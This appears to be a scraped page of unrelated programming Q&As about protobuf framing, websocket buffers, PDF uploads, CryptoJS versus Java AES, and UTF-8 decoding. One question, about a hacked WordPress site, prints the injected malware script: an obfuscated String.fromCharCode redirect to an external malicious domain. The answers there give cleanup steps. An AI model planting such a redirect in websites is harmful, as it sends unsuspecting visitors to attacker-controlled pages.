Prefix protobuf message with signed 4 byte int - javascript

I am working with a Websocket API which I send protobuf objects to.
The documentation says:
Server uses Big Endian format for binary data.
Messages sent back and forth require a signed 4 byte int of the message size, prefixed to the message
So the payload should be a 4 byte int which contains the message size, followed by the message itself.
I set the message like this:
const message = req.serializeBinary();
How would I prefix a signed 4 byte int that contains the message size to this?
Note: console.log(message) prints the following to the console:
jspb.BinaryReader {decoder_: j…b.BinaryDecoder, fieldCursor_: 0, nextField_: -1, nextWireType_: -1, error_: false, …}
decoder_: jspb.BinaryDecoder
bytes_: Uint8Array(78) [0, 0, 0, 74, 152, 182, 75, 75, 242, 233, 64, 4, 49, 48, 53, 57, 242, 233, 64, 35, 77, 101, 115, 115, 97, 103, 101, 32, 108, 101, 110, 103, 116, 104, 32, 114, 101, 99, 101, 105, 118, 101, 100, 32, 105, 115, 32, 105, 110, 118, 97, 108, 105, 100, 46, 194, 233, 64, 19, 82, 105, 116, 104, 109, 105, 99, 32, 83, 121, 115, 116, 101, 109, 32, 73, 110, 102, 111]
cursor_: 78
end_: 78
error_: false
start_: 0
__proto__: Object
error_: false
fieldCursor_: 55
nextField_: 132760
nextWireType_: 2
readCallbacks_: null

I have never used google's protocol buffers library, only protobuf.js (https://github.com/protobufjs), but I assume we can work based on your object, since all we need is in message.bytes_
bl = message.bytes_.length;
msg = new Uint8Array(bl+4);
msg.set([(bl&0xff000000)>>24,(bl&0xff0000)>>16,(bl&0xff00)>>8,(bl&0xff)]);
msg.set(message.bytes_,4);
yourwebsocketobject.send(msg); // or maybe msg.buffer?
You will probably get better answers, but this may eventually work.

Related

How to decode websocket data on client?

I've spent numerous hours trying to decode a buffer from the server and I haven't been anle to figure it put.
I've tried to remove JSON.parse() and I still an error.
This is the sent data from the backend where I convert a plain object to a buffer and stringify it:
wss.clients.forEach((client) => {
if (client.userID === contactID) {
console.log(client.userID);
client.send(Buffer.from(JSON.stringify(messageObj)));
}
});
On the frontend I have a listener:
ws.socket.addEventListener("message", async (message) => {
const blobToText = await new Response(JSON.parse(message.data)).text();
alert(blobToText);
console.log(blobToText)
});
This is the error i'm getting:
[Unhandled promise rejection: SyntaxError: JSON Parse error: Unexpected identifier "object"]
at components/Home/Home.js:38:12 in ws.socket.addEventListener$argument_1
When I remove buffer from the backend (just using stringify), I get this on client:
{"fields":{"consumerTag":"amq.ctag-LijiOI-nknkknjknj","deliveryTag":16,"redelivered":false,"exchange":"","routingKey":"messages"},"properties":{"headers":{}},"content":{"type":"Buffer","data":[123,34,114,101,97,100,34,58,102,97,108,115,101,44,34,116,105,109,101,83,101,110,116,34,58,49,54,52,54,48,55,52,50,54,52,55,54,53,44,34,109,101,115,115,97,103,101,34,58,34,102,101,114,102,101,114,102,34,44,34,117,115,101,114,73,68,34,58,52,55,44,34,99,111,110,116,97,99,116,73,68,34,58,52,55,125]}}
I am getting this when parsing now; how can I convert this to the actual message object?:
[
101, 44, 34, 116, 105, 109, 101, 83, 101, 110, 116, 34,
58, 49, 54, 52, 54, 48, 55, 54, 56, 50, 48, 52,
58, 34, 101, 101, 102, 101, 119, 102, 34, 44, 34, 117,
115, 101, 114, 73, 68, 34, 58, 52, 55, 44, 34, 99,
]
Just get rid of the Buffer.
client.send(JSON.stringify(messageObj));
instead of
client.send(Buffer.from(JSON.stringify(messageObj)));

Convert uploaded PDF to file in node

I'm working on a codebase and I have to extend a controller to allow uploading of PDF files. I'm submitting the file through jquery/ajax with formData.
The Backend contains of a pretty large framework, which has its own type of request - So using something like formidable is out of the question for handling the file upload server side.
My Problem: The POST request arrives on the server and when I log the body parameter that contains the file I get the following:
file: [
37, 80, 68, 70, 45, 49, 46, 51, 10, 37, 255, 255,
255, 255, 10, 56, 32, 48, 32, 111, 98, 106, 10, 60,
60, 10, 47, 84, 121, 112, 101, 32, 47, 69, 120, 116,
71, 83, 116, 97, 116, 101, 10, 47, 67, 65, 32, 49,
10, 62, 62, 10, 101, 110, 100, 111, 98, 106, 10, 55,
32, 48, 32, 111, 98, 106, 10, 60, 60, 10, 47, 84,
121, 112, 101, 32, 47, 80, 97, 103, 101, 10, 47, 80,
97, 114, 101, 110, 116, 32, 49, 32, 48, 32, 82, 10,
47, 77, 101, 100,
... 23741 more items
]
Which, from my understanding is an Array Buffer of the uploaded file. Now I've read that I can just write this to the file system with the fs library like this:
fs.writeFile(filename, data);
Which does create the file on the server, however it is always a corrupted file and not an actual pdf.
What am I missing, I'm assuming it has something to do with the encoding of the formData that I'm not aware of?

WordPress site hacked redirect

i have a wordpress website and i saw that when i try to view the source code with chrome its show me this (look at the code):
so i search it in my files and found a file called lt_ that has that redirect code
so i wanted to know how to find the source of the malware
<head>
<script>window.location.href = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 105, 114, 99, 46, 108, 111, 118, 101, 103, 114, 101, 101, 110, 112, 101, 110, 99, 105, 108, 115, 46, 103, 97, 47, 112, 86, 77, 89, 110, 49, 120, 82, 63, 101, 120, 116, 101, 114, 110, 97, 108, 95, 105, 100, 61, 50, 49, 38, 97, 100, 95, 99, 97, 109, 112, 97, 105, 103, 110, 95, 105, 100, 61, 52, 51, 54, 55, 53);</script>
</head>
check this: wp-content/plugins/ * try to find wp-sleeeps * / that is the problem.
Delete wp-sleeeps and after that delete lt_
Same problem last 3 hours,
First, install WordFence and configure it for a Through scan, see if anything suspicious pops up in the scan.
If you want to search the files by the string, i suggest installing a plugin "String Locator". It's the quickest way to search through all WP files.
If your WP was hacked, in 99,9% of the cases it's not only 1 file.
When, and if, you identify the string that is suspicious, i suggest to run it through phpMyAdmin search as well to ensure it's not planted in the database to some of your pages.

CryptoJS giving other results than Java's Cipher.doFinal()

I am trying to write a function in JavaScript that I already have in Java. The function simply encodes a string with AES.
I tried different types like WordArray, ByteArray, String, HexString.
byte[] IV = new byte[] { 57, 118, 97, 110, 32, 77, 101, 100, 118, 101, 100, 101, 118, 100, 101, 118 };
byte[] md5 = { 52, -123, -23, -71, -89, 6, -59, -33, -48, 56, -69, -77, -100, 107, -68, 127 };
byte[] text= { 112, 101, 116, 101, 114, 46, 109, 111, 101, 108, 108, 101, 114, 64, 119, 101, 98, 46, 100, 101 };
String TRANSFORMATION = "AES/CBC/PKCS5Padding";
Cipher _cipher;
SecretKey _password;
IvParameterSpec _IVParamSpec;
_password = new SecretKeySpec(md5, ALGORITHM);
_IVParamSpec = new IvParameterSpec(IV);
_cipher = Cipher.getInstance(TRANSFORMATION);
_cipher.init(Cipher.ENCRYPT_MODE, _password, _IVParamSpec);
encryptedData = _cipher.doFinal(text);
Base64.Encoder enc = Base64.getEncoder();
String encData=enc.encodeToString(encryptedData);
var pass = CryptoJS.enc.Hex.parse(this.toWordArray([52, -123, -23, -71, -89, 6, -59, -33, -48, 56, -69, -77, -100, 107, -68, 127]));
var iv = CryptoJS.enc.Hex.parse(this.toWordArray([57, 118, 97, 110, 32, 77, 101, 100, 118, 101, 100, 101, 118, 100, 101, 118]));
var text = this.toWordArray([112, 101, 116, 101, 114, 46, 109, 111, 101, 108, 108, 101, 114, 64, 119, 101, 98, 46, 100, 101]);
var encrypted = CryptoJS.AES.encrypt(text, pass, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.Pkcs7 });
var utf8 = CryptoJS.enc.Utf8.parse(encrypted);
var base64 = CryptoJS.enc.Base64.stringify(utf8);
In Java the result is: VmivVhaBFNdJQMY5JHczcs4VQXvzH3qEswsT4PufAqg=
In JavaScript I expect the same output, but I get: VVRGUVRVQlE5VTFOQ1pLb1FFMDhUY05LQzRNcGF3UTBnNE1ZZ3luQW1Vaz0=

Decode invalid utf-8 by replacing troublesome byte sequences with question marks?

The problem: I'm given a sequence of bytes (say as a Uint8Array) which I'd like to interpret as a utf8-encoded string. That is, I'd like to decode the bytes into a valid unicode string.
However, it is possible that the bytes will not be a valid utf8-encoding. If that's the case, I'd like to do a "best effort" attempt to decode the string anyway.
In Python I can do the following:
>>> import codecs
>>> codecs.register_error('replace_?', lambda e: (u'?', e.start + 1))
>>> uint8array = map(ord, 'some mostly ok\x80string')
>>> uint8array
[115, 111, 109, 101, 32, 109, 111, 115, 116, 108, 121, 32, 111, 107, 128, 115, 116, 114, 105, 110, 103]
>>> ''.join(map(chr, uint8array)).decode('utf8', 'replace_?')
u'some mostly ok?string'
In JavaScript, I've learned the decoding would go as follows:
> uint8array = new Uint8Array([115, 111, 109, 101, 32, 109, 111, 115, 116, 108, 121, 32, 111, 107, 128, 115, 116, 114, 105, 110, 103])
[115, 111, 109, 101, 32, 109, 111, 115, 116, 108, 121, 32, 111, 107, 128, 115, 116, 114, 105, 110, 103]
> decodeURIComponent(escape(String.fromCharCode.apply(null, uint8array)))
Uncaught URIError: URI malformed(…)
As you can see, this raises an exception, much like the Python code would if I didn't specify my custom codec handler.
How would I go about getting the same behavior as the Python snippet - replacing the malformed utf8 bytes with '?' instead of choking on the whole string?

Categories